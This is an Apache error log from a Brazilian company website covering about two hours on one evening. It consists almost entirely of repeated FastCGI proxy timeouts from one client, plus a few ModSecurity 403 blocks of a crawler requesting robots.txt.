[Thu Mar 19 21:23:15.661904 2026] [proxy_fcgi:error] [pid 20435:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:60940] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:24:20.306190 2026] [proxy_fcgi:error] [pid 27293:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:32808] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:24:49.093887 2026] [proxy_fcgi:error] [pid 8307:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:32976] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:25:29.517935 2026] [proxy_fcgi:error] [pid 21219:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:33034] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:26:42.457815 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:27:17.753880 2026] [proxy_fcgi:error] [pid 19655:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:33320] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:27:39.689903 2026] [proxy_fcgi:error] [pid 20435:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:33456] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:28:15.893007 2026] [proxy_fcgi:error] [pid 21563:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:33508] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:28:38.613863 2026] [proxy_fcgi:error] [pid 7545:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33656] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:29:49.184978 2026] [proxy_fcgi:error] [pid 8307:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:33728] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:30:02.102918 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.244.43:36370] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyVCvu8EFLIOrSqIpvWYAAAAlQ"]
[Thu Mar 19 21:30:38.277805 2026] [proxy_fcgi:error] [pid 5816:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:33848] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:31:22.865822 2026] [proxy_fcgi:error] [pid 27293:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:33942] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:31:48.869835 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34048] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:32:17.837923 2026] [proxy_fcgi:error] [pid 19655:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34088] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:33:55.337786 2026] [proxy_fcgi:error] [pid 14269:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34128] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:34:32.750129 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34290] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:34:59.420943 2026] [proxy_fcgi:error] [pid 8307:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:34392] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:36:04.189877 2026] [proxy_fcgi:error] [pid 7545:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:34438] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:37:15.409810 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:34576] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:37:59.416002 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:34656] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:39:32.830222 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:34738] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:40:36.481884 2026] [proxy_fcgi:error] [pid 8307:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:34914] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:41:50.054036 2026] [proxy_fcgi:error] [pid 7545:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:35030] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:43:53.850025 2026] [proxy_fcgi:error] [pid 21219:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35124] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:44:59.637836 2026] [proxy_fcgi:error] [pid 15826:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:35334] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:46:06.333935 2026] [proxy_fcgi:error] [pid 14269:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35428] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:46:23.335867 2026] [:error] [pid 20435:tid 140411649607424] [client 74.7.228.61:60830] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyY35JaM1-0uhhUQJNHUgAAAIs"]
[Thu Mar 19 21:47:14.789810 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:35572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:48:18.374764 2026] [proxy_fcgi:error] [pid 21219:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:35742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:49:05.782347 2026] [proxy_fcgi:error] [pid 14269:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:35894] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:49:56.637830 2026] [proxy_fcgi:error] [pid 14269:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:36032] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:50:43.893777 2026] [proxy_fcgi:error] [pid 21563:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:36214] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:51:13.820578 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:36362] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:51:36.709934 2026] [proxy_fcgi:error] [pid 26799:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:36518] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:52:15.345888 2026] [proxy_fcgi:error] [pid 7235:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36584] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:53:15.197889 2026] [proxy_fcgi:error] [pid 17653:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:36714] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:54:01.070111 2026] [proxy_fcgi:error] [pid 8307:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:36864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:54:32.691979 2026] [proxy_fcgi:error] [pid 5816:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:36984] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:54:54.256789 2026] [proxy_fcgi:error] [pid 7893:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37160] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:56:13.913894 2026] [proxy_fcgi:error] [pid 17887:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:37196] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:57:17.405810 2026] [proxy_fcgi:error] [pid 8307:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37400] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:57:59.710298 2026] [proxy_fcgi:error] [pid 19655:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:37572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 21:58:52.709917 2026] [proxy_fcgi:error] [pid 7235:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:37702] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:00:15.109857 2026] [proxy_fcgi:error] [pid 7893:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:37842] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:00:50.889908 2026] [proxy_fcgi:error] [pid 21563:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:38064] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:01:35.765903 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:38146] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:02:55.246026 2026] [proxy_fcgi:error] [pid 5816:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38244] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:04:00.017920 2026] [proxy_fcgi:error] [pid 7235:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:38428] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:04:56.119068 2026] [proxy_fcgi:error] [pid 8307:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38572] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:07:15.345875 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38732] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:08:32.501852 2026] [proxy_fcgi:error] [pid 21219:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39080] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:09:45.997281 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:39234] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:10:35.657788 2026] [proxy_fcgi:error] [pid 30077:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:39384] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:11:03.893847 2026] [proxy_fcgi:error] [pid 20435:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39658] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:11:38.101857 2026] [proxy_fcgi:error] [pid 7893:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:39686] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:13:32.525855 2026] [proxy_fcgi:error] [pid 21219:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:39742] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:14:13.985958 2026] [proxy_fcgi:error] [pid 21219:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:39868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:15:22.981877 2026] [proxy_fcgi:error] [pid 5816:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:39908] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:17:04.090004 2026] [proxy_fcgi:error] [pid 20435:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:40012] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:17:52.958091 2026] [proxy_fcgi:error] [pid 19655:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:40146] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:19:14.074647 2026] [proxy_fcgi:error] [pid 21219:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:40228] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:20:35.380030 2026] [proxy_fcgi:error] [pid 19655:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:40346] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:21:35.481890 2026] [proxy_fcgi:error] [pid 20435:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:40498] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:22:53.490094 2026] [proxy_fcgi:error] [pid 30077:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40592] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:24:47.465834 2026] [proxy_fcgi:error] [pid 21563:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40740] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:25:43.857826 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:40904] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:26:40.761926 2026] [proxy_fcgi:error] [pid 20435:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41008] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:27:22.086095 2026] [proxy_fcgi:error] [pid 5816:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:41096] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:28:08.021888 2026] [proxy_fcgi:error] [pid 21219:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41138] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:28:57.286642 2026] [proxy_fcgi:error] [pid 17887:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:41208] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:30:15.475757 2026] [proxy_fcgi:error] [pid 26799:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:41346] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:31:01.141904 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:41492] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:32:09.541830 2026] [proxy_fcgi:error] [pid 7235:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:41548] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:33:14.837847 2026] [proxy_fcgi:error] [pid 8307:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41636] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:33:55.398014 2026] [proxy_fcgi:error] [pid 15826:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:41724] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:34:47.697843 2026] [proxy_fcgi:error] [pid 21563:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:41838] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:36:04.321857 2026] [proxy_fcgi:error] [pid 7235:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41922] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:37:23.588285 2026] [proxy_fcgi:error] [pid 15826:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:42086] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:38:14.909868 2026] [proxy_fcgi:error] [pid 8307:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:42174] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:39:02.617973 2026] [proxy_fcgi:error] [pid 8307:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:42214] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:40:37.365917 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42336] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:41:33.881965 2026] [proxy_fcgi:error] [pid 7545:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:42470] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:42:35.625783 2026] [proxy_fcgi:error] [pid 19655:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42574] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:43:37.269963 2026] [proxy_fcgi:error] [pid 30077:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:42732] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:44:15.721800 2026] [proxy_fcgi:error] [pid 21219:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:42846] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:45:15.224159 2026] [proxy_fcgi:error] [pid 7893:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:42926] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:47:11.147621 2026] [proxy_fcgi:error] [pid 30077:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:43056] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:48:02.573843 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:43338] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:48:56.721835 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:43412] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:50:35.389781 2026] [proxy_fcgi:error] [pid 7235:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:43530] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:51:23.457511 2026] [proxy_fcgi:error] [pid 26799:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:43712] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:51:47.644908 2026] [proxy_fcgi:error] [pid 21563:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44062] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:52:34.613875 2026] [proxy_fcgi:error] [pid 7893:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44088] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:53:53.801808 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44202] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:54:57.913984 2026] [proxy_fcgi:error] [pid 15826:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:44298] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:55:33.757654 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:44382] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:57:15.461861 2026] [proxy_fcgi:error] [pid 8307:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44470] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:58:01.978883 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:44618] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 22:59:53.941846 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:44714] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:00:53.933841 2026] [proxy_fcgi:error] [pid 19655:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:44918] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:01:40.037982 2026] [proxy_fcgi:error] [pid 17887:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:44978] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:02:38.625535 2026] [proxy_fcgi:error] [pid 8307:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45026] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:03:55.445837 2026] [proxy_fcgi:error] [pid 30077:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:45166] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:04:19.321356 2026] [proxy_fcgi:error] [pid 17887:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:45344] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:05:54.002136 2026] [proxy_fcgi:error] [pid 19655:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45362] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:07:19.921931 2026] [proxy_fcgi:error] [pid 7235:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:45582] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:08:20.234752 2026] [proxy_fcgi:error] [pid 20435:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:45748] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:09:21.717918 2026] [proxy_fcgi:error] [pid 14269:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:45832] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:10:35.558530 2026] [proxy_fcgi:error] [pid 17653:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:45990] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:11:35.505888 2026] [proxy_fcgi:error] [pid 21219:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:46184] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:12:27.834702 2026] [:error] [pid 7545:tid 140411658000128] [client 74.7.228.61:47774] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abytC38B84UptSoTJtY9nQAAAYo"]
[Thu Mar 19 23:13:27.597034 2026] [proxy_fcgi:error] [pid 7235:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:46306] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:14:05.509808 2026] [proxy_fcgi:error] [pid 20435:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46598] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:14:55.741863 2026] [proxy_fcgi:error] [pid 21219:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:46664] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:15:46.401922 2026] [proxy_fcgi:error] [pid 27293:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:46776] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:16:42.721979 2026] [proxy_fcgi:error] [pid 21219:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:46840] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:17:17.433783 2026] [proxy_fcgi:error] [pid 20435:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:46928] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:17:39.089943 2026] [proxy_fcgi:error] [pid 17887:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:47250] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:19:11.976906 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:47300] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:19:58.765832 2026] [proxy_fcgi:error] [pid 8307:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47472] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:21:13.033840 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47552] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:22:15.357533 2026] [proxy_fcgi:error] [pid 8307:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47664] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:22:48.765837 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:47746] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:23:43.411137 2026] [:error] [pid 27293:tid 140411565680384] [client 74.7.228.61:60706] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyvr_-YZRR_7pZ7nDK6fwAAA9U"]
[Thu Mar 19 23:23:55.417910 2026] [proxy_fcgi:error] [pid 17653:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:47802] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:24:19.069871 2026] [proxy_fcgi:error] [pid 20435:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:48434] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:24:41.277890 2026] [proxy_fcgi:error] [pid 21563:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48596] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:25:35.401855 2026] [proxy_fcgi:error] [pid 30077:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:48638] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:25:58.355552 2026] [proxy_fcgi:error] [pid 7235:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:48948] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:26:27.897582 2026] [proxy_fcgi:error] [pid 26799:tid 140411565680384] (70007)The timeout specified has expired: [client 179.188.53.243:48988] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:27:20.205906 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.244.43:58736] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abywiPu8EFLIOrSqIpvW5QAAAlY"]
[Thu Mar 19 23:27:48.819494 2026] [proxy_fcgi:error] [pid 15826:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49030] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:28:39.597850 2026] [proxy_fcgi:error] [pid 20435:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49126] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:29:01.123953 2026] [proxy_fcgi:error] [pid 8307:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49396] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:29:16.387691 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.228.61:44566] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abyw_OoXxyEfFpUF8f872gAAAU4"]
[Thu Mar 19 23:29:22.088252 2026] [proxy_fcgi:error] [pid 7545:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49508] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:29:43.069824 2026] [proxy_fcgi:error] [pid 20435:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:49550] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:30:04.605878 2026] [proxy_fcgi:error] [pid 27293:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:49604] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:30:31.137915 2026] [proxy_fcgi:error] [pid 7235:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:49664] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:30:52.127976 2026] [proxy_fcgi:error] [pid 5816:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:49738] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:31:14.045954 2026] [proxy_fcgi:error] [pid 8307:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:49812] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:31:36.020420 2026] [proxy_fcgi:error] [pid 21563:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:49900] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 23:31:57.025804 2026] [proxy_fcgi:error] [pid 17887:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:50012] AH01075: Error dispatching request to : (polling)
